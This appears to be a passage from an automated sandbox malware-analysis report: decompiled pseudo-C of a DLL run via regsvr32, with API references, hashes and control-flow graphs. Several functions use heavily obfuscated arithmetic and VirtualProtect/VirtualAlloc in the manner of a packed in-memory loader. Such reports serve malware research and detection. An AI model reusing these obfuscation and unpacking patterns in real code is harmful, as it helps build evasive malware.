                                                                                                                					 *(_t228 + 0x1c) = (( *( *((intOrPtr*)(_t228 + 0x18)) - _t154 * _t65 +  *0x100b825c + _t154 * _t65 +  *0x100b825c + _t227) & 0x000000ff) +  *((char*)(_t219 - _t219 * _t65 + _t219 * _t65 - _t154 - _t154 - _t65 - _t65 + _t219 +  *(_t228 + 0x1c) +  *(_t228 + 0x14))) +  *(_t228 + 0x1c)) % 0x57c0;
                                                                                                                					_t142 = 2;
                                                                                                                					_t72 = 3;
                                                                                                                					 *((char*)(_t228 + 0x13)) =  *((intOrPtr*)((_t142 - (_t209 * _t209 + _t140 * _t71) * _t219 + (_t209 * _t209 + _t140 * _t71) * _t219) * _t71 +  *(_t228 + 0x14) + ((_t72 - _t219) *  *0x100b8254 + ((_t154 * _t71 + _t209) * _t219 - _t209 - 4) * _t154 + _t209) * 2 + _t227));
                                                                                                                					_t78 =  *0x100b8254; // 0x0
                                                                                                                					 *((char*)((_t209 * 3 - _t154 - _t154 + _t209) *  *0x100b8254 +  *(_t228 + 0x14) + ((1 - (_t154 * _t219 + _t209) *  *0x100b8250) * _t219 + (1 - _t209) *  *0x100b825c - _t154) * 2 + _t227)) =  *((intOrPtr*)( *((intOrPtr*)(_t228 + 0x18)) - _t78 * 3 + _t227));
                                                                                                                					_t96 =  *0x100b825c; // 0x0
                                                                                                                					_t97 =  *0x100b8250; // 0x0
                                                                                                                					_t100 =  *0x100b8254; // 0x0
                                                                                                                					 *(_t228 + 0x14) =  *(_t228 + 0x14) + 1;
                                                                                                                					 *((char*)((_t96 * _t96 * _t97 - (_t97 + 1) *  *0x100b8264 << 2) - (4 + _t100 * 8) *  *0x100b8260 +  *((intOrPtr*)(_t228 + 0x18)) + _t227)) =  *((intOrPtr*)(_t228 + 0x13));
                                                                                                                					if( *(_t228 + 0x14) >= 0x57c0) {
                                                                                                                						break;
                                                                                                                					}
                                                                                                                					_t209 =  *0x100b8258; // 0x0
                                                                                                                					_t219 =  *0x100b8260; // 0x0
                                                                                                                					_t154 =  *0x100b8264; // 0x0
                                                                                                                				}
                                                                                                                				return  *0x100bc094( *(_t228 + 0x1c));
                                                                                                                			}































                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??3@malloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 3530088491-0
                                                                                                                • Opcode ID: f8800837ce64f2cdc43e779a333cc347272846a76cd1fc0710a6f39349f454ec
                                                                                                                • Instruction ID: 62f6901f4166316c9f15a6d932215c50802101088afbd3becb357e423d0d5db1
                                                                                                                • Opcode Fuzzy Hash: f8800837ce64f2cdc43e779a333cc347272846a76cd1fc0710a6f39349f454ec
                                                                                                                • Instruction Fuzzy Hash: 7871B53A7442268FD70CCF7CCED65C5BBDAE7D9214B05962AD540CB3B9EA70A609CB40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 133 1004fdaa-1004fdc8 HeapCreate 134 1004fdcd-1004fdda call 1004fd4f 133->134 135 1004fdca-1004fdcc 133->135 138 1004fe00-1004fe03 134->138 139 1004fddc-1004fde9 call 1004edf9 134->139 139->138 142 1004fdeb-1004fdfe HeapDestroy 139->142 142->135
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1004FDAA(intOrPtr _a4) {
                                                                                                                				void* _t6;
                                                                                                                				intOrPtr _t7;
                                                                                                                				void* _t10;
                                                                                                                
                                                                                                                				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                                                                                                                				 *0x100be104 = _t6;
                                                                                                                				if(_t6 != 0) {
                                                                                                                					_t7 = E1004FD4F(__eflags);
                                                                                                                					__eflags = _t7 - 3;
                                                                                                                					 *0x100bff64 = _t7;
                                                                                                                					if(_t7 != 3) {
                                                                                                                						L5:
                                                                                                                						__eflags = 1;
                                                                                                                						return 1;
                                                                                                                					} else {
                                                                                                                						_t10 = L1004EDF9(0x3f8);
                                                                                                                						__eflags = _t10;
                                                                                                                						if(_t10 != 0) {
                                                                                                                							goto L5;
                                                                                                                						} else {
                                                                                                                							HeapDestroy( *0x100be104);
                                                                                                                							 *0x100be104 =  *0x100be104 & 0x00000000;
                                                                                                                							goto L1;
                                                                                                                						}
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					L1:
                                                                                                                					return 0;
                                                                                                                				}
                                                                                                                			}







                                                                                                                APIs
                                                                                                                • HeapCreate.KERNEL32(00000000,00001000,00000000,10048C0C,00000001,?,?,00000001,?,?,10048D8A,00000001,?,?,100B5A50,0000000C), ref: 1004FDBB
                                                                                                                • HeapDestroy.KERNEL32(?,?,00000001,?,?,10048D8A,00000001,?,?,100B5A50,0000000C,10048E44,?), ref: 1004FDF1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Heap$CreateDestroy
                                                                                                                • String ID:
                                                                                                                • API String ID: 3296620671-0
                                                                                                                • Opcode ID: 03b4f1f114decc4727ca378d293384e74c17ab74c07022bfccd59dd724457b58
                                                                                                                • Instruction ID: 0ac11d57fa9a87977446124cfbfb09a9c68fff5c93b403867fcd0a28ce5f26ca
                                                                                                                • Opcode Fuzzy Hash: 03b4f1f114decc4727ca378d293384e74c17ab74c07022bfccd59dd724457b58
                                                                                                                • Instruction Fuzzy Hash: 47E06D78A553A29EF710DB748E8D77636D5E704386F30483DF401D60A1EB709980D60A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                control_flow_graph 143 10004ac7-10004ad7 144 10004ad9-10004ada 143->144 145 10004adf-10004b1a 143->145 146 10004d52-10004d55 144->146 147 10004b20-10004b2e 145->147 148 10004be5-10004ce2 145->148 151 10004b34-10004b3e 147->151 152 10004bdd-10004be0 147->152 149 10004cf4-10004d4c VirtualProtect 148->149 150 10004ce4-10004cf0 148->150 155 10004d4e-10004d51 149->155 150->149 153 10004b40-10004b51 151->153 154 10004b8c-10004bda 151->154 152->155 156 10004b53-10004b80 153->156 157 10004b88 153->157 154->152 155->146 156->152 158 10004b82 156->158 157->154 158->157
                                                                                                                C-Code - Quality: 91%
                                                                                                                			E10004AC7() {
                                                                                                                				intOrPtr _t88;
                                                                                                                				signed int _t90;
                                                                                                                				signed int _t91;
                                                                                                                				signed int _t102;
                                                                                                                				signed int _t103;
                                                                                                                				signed int _t113;
                                                                                                                				signed int _t119;
                                                                                                                				signed int _t121;
                                                                                                                				signed int _t125;
                                                                                                                				signed int _t131;
                                                                                                                				signed int _t143;
                                                                                                                				signed int _t144;
                                                                                                                				signed int _t181;
                                                                                                                				signed int _t182;
                                                                                                                				signed int _t183;
                                                                                                                				signed int _t187;
                                                                                                                				signed int _t188;
                                                                                                                				signed int _t192;
                                                                                                                				signed int _t197;
                                                                                                                				signed int _t204;
                                                                                                                				signed int _t207;
                                                                                                                				signed int _t224;
                                                                                                                				signed int _t239;
                                                                                                                				intOrPtr* _t248;
                                                                                                                				void* _t256;
                                                                                                                
                                                                                                                				_t187 =  *(_t256 + 0x18);
                                                                                                                				_t88 =  *((intOrPtr*)(_t187 + 8));
                                                                                                                				 *((intOrPtr*)(_t256 + 0xc)) = _t88;
                                                                                                                				if(_t88 != 0) {
                                                                                                                					_t183 =  *0x100b8254; // 0x0
                                                                                                                					_t143 =  *(_t187 + 0xc);
                                                                                                                					_t188 =  *0x100b825c; // 0x0
                                                                                                                					_t207 =  *0x100b8264; // 0x0
                                                                                                                					_t204 =  *0x100b8258; // 0x0
                                                                                                                					_t90 = _t204 * _t183;
                                                                                                                					_t6 = _t188 - 2; // -2
                                                                                                                					 *(_t256 + 0x10) = _t90;
                                                                                                                					 *(_t256 + 0x14) = _t143;
                                                                                                                					if((_t143 & (_t90 + _t6) * _t207 + 0x02000000) == 0) {
                                                                                                                						_t91 =  *0x100b8260; // 0x0
                                                                                                                						_t144 =  *0x100b8250; // 0x0
                                                                                                                						_t47 = _t183 + 2; // 0x2
                                                                                                                						_t52 = _t183 + 0x8000000; // 0x8000000
                                                                                                                						asm("sbb ebx, ebx");
                                                                                                                						asm("sbb eax, eax");
                                                                                                                						_t224 =  *0x100b8250; // 0x0
                                                                                                                						_t102 =  *0x100b8250; // 0x0
                                                                                                                						_t103 =  *0x100b8260; // 0x0
                                                                                                                						_t192 =  *0x100b825c; // 0x0
                                                                                                                						_t197 =  *0x100b8250; // 0x0
                                                                                                                						asm("sbb eax, eax");
                                                                                                                						 *(_t256 + 0x18) =  *(0x100b826c + ( ~( ~(_t103 * _t103 + _t192 * _t183 * _t183 + _t103 + (_t224 - _t204 * _t207 - _t188 - 0x00000001) * _t207 - (_t102 + _t204) * _t103 * _t183 + _t204 + _t183 - 0x80000000 &  *(_t256 + 0x14))) + ( ~( ~(0x40000000 + ((_t144 + _t91 + 0x00000001) * _t91 - _t47 * _t183 + _t207 * 0x00000003 - _t188 - _t204) * 0x00000004 &  *(_t256 + 0x14))) +  ~( ~(((_t91 - _t207) *  *0x100b8250 * 0x00000004 - 0x00000008) *  *0x100b8260 + (_t183 + _t52 - _t188 - _t207) * 0x00000004 &  *(_t256 + 0x14))) * 2) * 2) * 4);
                                                                                                                						_t113 =  *0x100b8260; // 0x0
                                                                                                                						if(( *(_t256 + 0x14) & (1 -  *(_t256 + 0x10) - _t113) * _t207 - _t197 * 0x00000003 - _t113 -  *0x100b825c +  *(_t256 + 0x10) + 0x4000001) != 0) {
                                                                                                                							 *(_t256 + 0x18) =  *(_t256 + 0x18) | 0x00000200 - _t113 * 0x0000000c;
                                                                                                                						}
                                                                                                                						_t119 = VirtualProtect( *( *(_t256 + 0x34)),  *((intOrPtr*)(_t256 + 0x24)) - _t197 * 3,  *(_t256 + 0x1c), _t256 + (((_t113 + _t204) * 8 - 8) * _t113 - (_t183 * _t183 << 3) + 8) * _t113 + 0x28 + ((_t183 * _t207 + 1) * _t204 - _t183 * 3 - (_t207 << 2)) * 8); // executed
                                                                                                                						asm("sbb eax, eax");
                                                                                                                						_t121 =  ~( ~_t119);
                                                                                                                						L14:
                                                                                                                						return _t121;
                                                                                                                					}
                                                                                                                					_t239 =  *(_t256 + 0x28);
                                                                                                                					_t181 =  *_t239;
                                                                                                                					 *(_t256 + 0x18) = _t181;
                                                                                                                					if(_t181 !=  *((intOrPtr*)(_t239 + 4))) {
                                                                                                                						L10:
                                                                                                                						_t121 = 1;
                                                                                                                						goto L14;
                                                                                                                					}
                                                                                                                					_t182 =  *0x100b8260; // 0x0
                                                                                                                					if( *((intOrPtr*)(_t239 + 0x10)) != 0) {
                                                                                                                						L9:
                                                                                                                						_t125 =  *0x100b8250; // 0x0
                                                                                                                						_t35 = _t125 * 2; // 0x2001
                                                                                                                						_t38 = _t125 * _t125 * _t125 * _t183 - 8; // -8
                                                                                                                						 *((intOrPtr*)( *((intOrPtr*)(_t256 + 0x30)) + 0x20))( *((intOrPtr*)(_t256 + 0x24)),  *((intOrPtr*)(_t256 + 0x24)), (_t125 * _t125 * _t125 * _t183 + _t38) * _t182 + ((1 - _t90 - _t207) * _t204 - (_t183 + _t207) * _t188 + _t183 + _t35 + 0x2000 + _t207) * 2,  *((intOrPtr*)( *((intOrPtr*)(_t256 + 0x24)) + 0x34)));
                                                                                                                						goto L10;
                                                                                                                					}
                                                                                                                					_t248 =  *((intOrPtr*)(_t256 + 0x24));
                                                                                                                					_t131 =  *(_t248 + 0x3c);
                                                                                                                					 *(_t256 + 0x28) = _t131;
                                                                                                                					if( *((intOrPtr*)( *_t248 + 0x38)) == _t131) {
                                                                                                                						L8:
                                                                                                                						_t90 =  *(_t256 + 0x10);
                                                                                                                						goto L9;
                                                                                                                					}
                                                                                                                					if( *(_t256 + 0x1c) %  *(_t256 + 0x28) + ((_t183 - _t204 * _t207) * _t204 - (_t188 * _t204 + _t182 + 2) * _t188 + _t182 + _t207) * 2 != 0) {
                                                                                                                						goto L10;
                                                                                                                					}
                                                                                                                					_t188 =  *0x100b825c; // 0x0
                                                                                                                					goto L8;
                                                                                                                				}
                                                                                                                				return _t88 + 1;
                                                                                                                			}





























                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ef3a04f4dff34a31cf402d9c2459d2c1a64f6553dd01cc38d54e39f4c535d94b
                                                                                                                • Instruction ID: cba6f9133dd935da1f7fb0af6c162101a408afe13dd0a8dcfb9efeb81b3381b4
                                                                                                                • Opcode Fuzzy Hash: ef3a04f4dff34a31cf402d9c2459d2c1a64f6553dd01cc38d54e39f4c535d94b
                                                                                                                • Instruction Fuzzy Hash: 2D81A87524431E8FD708DF68CAC1A85BBE8FB99340F01563AD955CB2B5F670DA18CB84
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                control_flow_graph 160 10006a41-10006a4e call 10047026 163 10006a50 160->163 164 10006a51-10006a5f 160->164 165 10006a61-10006a6b 164->165 166 10006a6d-10006a6e call 100470e9 164->166 165->165 165->166 168 10006a73-10006a81 166->168
                                                                                                                C-Code - Quality: 61%
                                                                                                                			E10006A41(void* __eax, void* __ebx, void* __esi, void* __eflags) {
                                                                                                                				void* _t4;
                                                                                                                				signed int _t9;
                                                                                                                				char _t11;
                                                                                                                				signed int _t14;
                                                                                                                				void* _t16;
                                                                                                                				void* _t17;
                                                                                                                				signed int _t19;
                                                                                                                
                                                                                                                				_t4 = E10047026(__ebx, _t16, _t17, __esi);
                                                                                                                				if(_t4 != 0) {
                                                                                                                					_t14 =  *0x100b8268; // 0x0
                                                                                                                					_push(__ebx);
                                                                                                                					_t11 = 0;
                                                                                                                					__eflags = _t14;
                                                                                                                					_push(__esi);
                                                                                                                					_t19 = _t14;
                                                                                                                					if(__eflags > 0) {
                                                                                                                						do {
                                                                                                                							 *((char*)(_t11 + _t4)) = _t11;
                                                                                                                							_t11 = _t11 + 1;
                                                                                                                							__eflags = _t11 -  *0x100b8268; // 0x0
                                                                                                                						} while (__eflags < 0);
                                                                                                                					}
                                                                                                                					_push(_t4); // executed
                                                                                                                					E100470E9(_t11, _t17, _t19, __eflags); // executed
                                                                                                                					asm("sbb eax, eax");
                                                                                                                					_t9 =  ~(_t11 - _t19) & 0x00000003;
                                                                                                                					__eflags = _t9;
                                                                                                                					return _t9;
                                                                                                                				} else {
                                                                                                                					return _t4;
                                                                                                                				}
                                                                                                                			}











                                                                                                                APIs
                                                                                                                • _malloc.LIBCMT ref: 10006A46
                                                                                                                  • Part of subcall function 10047026: __FF_MSGBANNER.LIBCMT ref: 10047049
                                                                                                                  • Part of subcall function 10047026: __NMSG_WRITE.LIBCMT ref: 10047050
                                                                                                                  • Part of subcall function 10047026: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,1005493C,?,00000001,00000001,1004ECAF,00000018,100B5BF0,0000000C,1004ED3E,00000001), ref: 1004709E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap_malloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 501242067-0
                                                                                                                • Opcode ID: 0c74340f4aac69231e506ba60836da3ec54c1cf5d74f5cb118ecd3987c823857
                                                                                                                • Instruction ID: 4f145986321b1b754f88d515b63b48c0031841552eadea7b4491a108aed0ee8e
                                                                                                                • Opcode Fuzzy Hash: 0c74340f4aac69231e506ba60836da3ec54c1cf5d74f5cb118ecd3987c823857
                                                                                                                • Instruction Fuzzy Hash: A3E0CD3B3555234FFF04FBFC9CD54551249D71509132447B9F441D6556E920ED00C761
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 169 1004c659-1004c65f call 1004c569 171 1004c664-1004c667 169->171
                                                                                                                C-Code - Quality: 25%
                                                                                                                			E1004C659() {
                                                                                                                				void* _t1;
                                                                                                                				void* _t2;
                                                                                                                				void* _t3;
                                                                                                                				void* _t4;
                                                                                                                				void* _t7;
                                                                                                                
                                                                                                                				_push(1);
                                                                                                                				_push(0);
                                                                                                                				_push(0); // executed
                                                                                                                				_t1 = E1004C569(_t2, _t3, _t4, _t7); // executed
                                                                                                                				return _t1;
                                                                                                                			}









                                                                                                                APIs
                                                                                                                • _doexit.LIBCMT ref: 1004C65F
                                                                                                                  • Part of subcall function 1004C569: __lock.LIBCMT ref: 1004C577
                                                                                                                  • Part of subcall function 1004C569: __decode_pointer.LIBCMT ref: 1004C5A6
                                                                                                                  • Part of subcall function 1004C569: __decode_pointer.LIBCMT ref: 1004C5B3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __decode_pointer$__lock_doexit
                                                                                                                • String ID:
                                                                                                                • API String ID: 3276244213-0
                                                                                                                • Opcode ID: 30728fd0b73de8e9593f588b56ecaf7ae26a14441270695ef39d91977627781b
                                                                                                                • Instruction ID: 14c789b520978ccb89d4cdf03b6d23a9df2590e4dd267fbcd28f0b27d1ba4d1f
                                                                                                                • Opcode Fuzzy Hash: 30728fd0b73de8e9593f588b56ecaf7ae26a14441270695ef39d91977627781b
                                                                                                                • Instruction Fuzzy Hash: 3FA00269BD470461F8A0D1502C43F5821415764F01FE40060FB0CAC1C1A4C63298405B
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 172 10001186-10006066 VirtualAlloc
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E10001186(void* _a4, long _a8, long _a12, long _a16) {
                                                                                                                				void* _t5;
                                                                                                                
                                                                                                                				_t5 = VirtualAlloc(_a4, _a8, _a12, _a16); // executed
                                                                                                                				return _t5;
                                                                                                                			}




                                                                                                                0x10006060
                                                                                                                0x10006066

                                                                                                                APIs
                                                                                                                • VirtualAlloc.KERNEL32(?,?,?,?), ref: 10006060
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 4275171209-0
                                                                                                                • Opcode ID: 337bfef5fbb8ec1e80fc560bc03efe550ee3042e26fca0366982ee7275b36580
                                                                                                                • Instruction ID: 01b1a425d789cbdabc9439a8440992a441d7e150583865e39de4930a53530a10
                                                                                                                • Opcode Fuzzy Hash: 337bfef5fbb8ec1e80fc560bc03efe550ee3042e26fca0366982ee7275b36580
                                                                                                                • Instruction Fuzzy Hash: 6BC00836458796EBDF12DF90CD44A6FBBA2FB88745F280D5CF6A251074C7229428EF06
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 174 100011bd-1000607e VirtualFree
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E100011BD(void* _a4, long _a8, long _a12) {
                                                                                                                				int _t4;
                                                                                                                
                                                                                                                				_t4 = VirtualFree(_a4, _a8, _a12); // executed
                                                                                                                				return _t4;
                                                                                                                			}




                                                                                                                0x10006078
                                                                                                                0x1000607e

                                                                                                                APIs
                                                                                                                • VirtualFree.KERNELBASE(?,?,?), ref: 10006078
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 1263568516-0
                                                                                                                • Opcode ID: 2e1cfd14d36694fa5377ceb24a8feb4c8711a4a8e9abad8071f54aa78b3d79f2
                                                                                                                • Instruction ID: ab04b333b1ee95674dc45df974ef924abd0ea2dd43eb25ff2de0b1c206d9cb0b
                                                                                                                • Opcode Fuzzy Hash: 2e1cfd14d36694fa5377ceb24a8feb4c8711a4a8e9abad8071f54aa78b3d79f2
                                                                                                                • Instruction Fuzzy Hash: D1B00239458214FFEF126B50DD4494FBFA2FB88365F20C958F5AA51035C7328420EB02
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 96%
                                                                                                                			E100464D4(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				intOrPtr _t114;
                                                                                                                				signed int _t115;
                                                                                                                				signed int _t116;
                                                                                                                				signed int _t118;
                                                                                                                				intOrPtr _t122;
                                                                                                                				long _t131;
                                                                                                                				signed int _t138;
                                                                                                                				signed int _t139;
                                                                                                                				void* _t143;
                                                                                                                				signed int _t147;
                                                                                                                				signed int _t148;
                                                                                                                				void* _t156;
                                                                                                                				intOrPtr* _t163;
                                                                                                                				signed int _t175;
                                                                                                                				signed int _t176;
                                                                                                                				signed int _t179;
                                                                                                                				void* _t181;
                                                                                                                				signed short _t190;
                                                                                                                				intOrPtr _t192;
                                                                                                                				void* _t200;
                                                                                                                				void* _t204;
                                                                                                                				void* _t205;
                                                                                                                				void* _t207;
                                                                                                                
                                                                                                                				_t165 = __ecx;
                                                                                                                				_push(0x7c);
                                                                                                                				_t109 = E1004764D(0x10091aa8, __ebx, __edi, __esi);
                                                                                                                				_t200 = __ecx;
                                                                                                                				 *(_t204 - 0x10) = __ecx;
                                                                                                                				_t163 =  *((intOrPtr*)(_t204 + 8));
                                                                                                                				_t190 =  *(_t163 + 4);
                                                                                                                				 *(_t204 - 0x1c) = _t190;
                                                                                                                				if(_t190 == 0x200 || _t190 == 0xa0 || _t190 == 0x202 || _t190 == 0x205 || _t190 == 0x208) {
                                                                                                                					if(GetKeyState(1) < 0 || GetKeyState(2) < 0) {
                                                                                                                						L49:
                                                                                                                						_t190 =  *(_t204 - 0x1c);
                                                                                                                						goto L50;
                                                                                                                					} else {
                                                                                                                						_t109 = GetKeyState(4);
                                                                                                                						_t217 = _t109;
                                                                                                                						if(_t109 < 0) {
                                                                                                                							goto L49;
                                                                                                                						} else {
                                                                                                                							_t114 = E1001E375(_t163, _t165, GetKeyState, _t200, _t217);
                                                                                                                							_push( *_t163);
                                                                                                                							_t192 = _t114;
                                                                                                                							 *((intOrPtr*)(_t204 - 0x18)) = _t192;
                                                                                                                							while(1) {
                                                                                                                								_t109 = E10013FEA(_t163, _t165, _t204);
                                                                                                                								if(_t109 == 0) {
                                                                                                                									break;
                                                                                                                								}
                                                                                                                								__eflags =  *(_t109 + 0x3c) & 0x00000401;
                                                                                                                								if(( *(_t109 + 0x3c) & 0x00000401) != 0) {
                                                                                                                									break;
                                                                                                                								} else {
                                                                                                                									_push(GetParent( *(_t109 + 0x20)));
                                                                                                                									continue;
                                                                                                                								}
                                                                                                                							}
                                                                                                                							if(_t109 == _t200) {
                                                                                                                								_t164 =  *(_t192 + 0x3c);
                                                                                                                								_t115 = E10014305(_t200);
                                                                                                                								__eflags = _t164;
                                                                                                                								 *(_t204 - 0x14) = _t115;
                                                                                                                								if(__eflags == 0) {
                                                                                                                									L19:
                                                                                                                									_t116 = E10009F14(__eflags, 0x70);
                                                                                                                									 *(_t204 - 0x1c) = _t116;
                                                                                                                									_t164 = 0;
                                                                                                                									__eflags = _t116;
                                                                                                                									 *(_t204 - 4) = 0;
                                                                                                                									if(__eflags != 0) {
                                                                                                                										_t164 = E10045F69(0, _t116, _t192, _t200, __eflags);
                                                                                                                									}
                                                                                                                									 *(_t204 - 4) =  *(_t204 - 4) | 0xffffffff;
                                                                                                                									_t118 =  *((intOrPtr*)( *_t164 + 0x134))( *(_t204 - 0x14), 1);
                                                                                                                									__eflags = _t118;
                                                                                                                									if(_t118 != 0) {
                                                                                                                										SendMessageA( *(_t164 + 0x20), 0x401, 0, 0);
                                                                                                                										_t200 =  *(_t204 - 0x10);
                                                                                                                										 *(_t192 + 0x3c) = _t164;
                                                                                                                										L24:
                                                                                                                										E10049170(_t192, _t204 - 0x88, 0, 0x30);
                                                                                                                										_t122 =  *((intOrPtr*)(_t204 + 8));
                                                                                                                										 *((intOrPtr*)(_t204 - 0x24)) =  *((intOrPtr*)(_t122 + 0x18));
                                                                                                                										 *(_t204 - 0x28) =  *(_t122 + 0x14);
                                                                                                                										ScreenToClient( *(_t200 + 0x20), _t204 - 0x28);
                                                                                                                										E10049170(_t192, _t204 - 0x58, 0, 0x30);
                                                                                                                										_t207 = _t205 + 0x18;
                                                                                                                										 *(_t204 - 0x58) = 0x28;
                                                                                                                										_t109 =  *((intOrPtr*)( *_t200 + 0x6c))( *(_t204 - 0x28),  *((intOrPtr*)(_t204 - 0x24)), _t204 - 0x58);
                                                                                                                										asm("sbb ecx, ecx");
                                                                                                                										_t175 =  ~(_t109 + 1) & _t200;
                                                                                                                										__eflags =  *(_t192 + 0x44) - _t109;
                                                                                                                										 *(_t204 - 0x1c) = _t109;
                                                                                                                										 *(_t204 - 0x14) = _t175;
                                                                                                                										if( *(_t192 + 0x44) != _t109) {
                                                                                                                											L30:
                                                                                                                											__eflags = _t109 - 0xffffffff;
                                                                                                                											if(_t109 == 0xffffffff) {
                                                                                                                												SendMessageA( *(_t164 + 0x20), 0x401, 0, 0);
                                                                                                                												L39:
                                                                                                                												E1004628A(_t164,  *((intOrPtr*)(_t204 + 8)));
                                                                                                                												_t131 =  *(_t192 + 0x48);
                                                                                                                												__eflags = _t131;
                                                                                                                												if(_t131 != 0) {
                                                                                                                													__eflags =  *_t131 - 0x28;
                                                                                                                													if( *_t131 >= 0x28) {
                                                                                                                														SendMessageA( *(_t164 + 0x20), 0x405, 0, _t131);
                                                                                                                													}
                                                                                                                												}
                                                                                                                												__eflags =  *(_t192 + 0x48);
                                                                                                                												 *(_t192 + 0x40) =  *(_t204 - 0x14);
                                                                                                                												 *(_t192 + 0x44) =  *(_t204 - 0x1c);
                                                                                                                												if(__eflags == 0) {
